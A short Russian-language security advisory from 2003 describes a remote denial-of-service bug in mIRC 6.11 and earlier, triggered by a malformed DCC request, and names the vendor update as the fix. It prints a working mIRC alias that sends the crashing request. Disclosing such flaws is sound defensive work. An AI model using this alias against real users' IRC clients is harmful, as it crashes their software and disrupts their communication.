Удаленный отказ в обслуживании некорректным DCC запросом в mIRC
| Дата публикации: | 15.10.2003 |
| Всего просмотров: | 1811 |
| Опасность: | Низкая |
| Наличие исправления: | Да |
| Количество уязвимостей: | 1 |
| CVE ID: | Нет данных |
| Вектор эксплуатации: | Удаленная |
| Воздействие: | Отказ в обслуживании |
| CWE ID: | Нет данных |
| Наличие эксплоита: | Нет данных |
| Уязвимые продукты: | mIRC 6.x |
| Уязвимые версии: mIRC version 6.11 и более ранние версии
Описание: Уязвимость обнаружена в mIRC. Удаленный атакующий может аварийно завершить работу клиента. Удаленный атакующий может послать специально обработанны DCC запрос, чтобы аварийно завершить работу клиента. Пример/Эксплоит:
mIRC alias:
/crash { .raw PRIVMSG $1 $+(:,$chr(1),DCC) send " $+ $str($rand(a,z) $+
$chr(32),250) $+ " 0 2130706433 $+(8192,$chr(1)) }
URL производителя: http://www.mirc.co.uk/ Решение: Установите последнюю версию клиента: http://www.mirc.co.uk/get.html |
|
| Ссылки: | [Full-Disclosure] Mirc Dos 6.11 and below |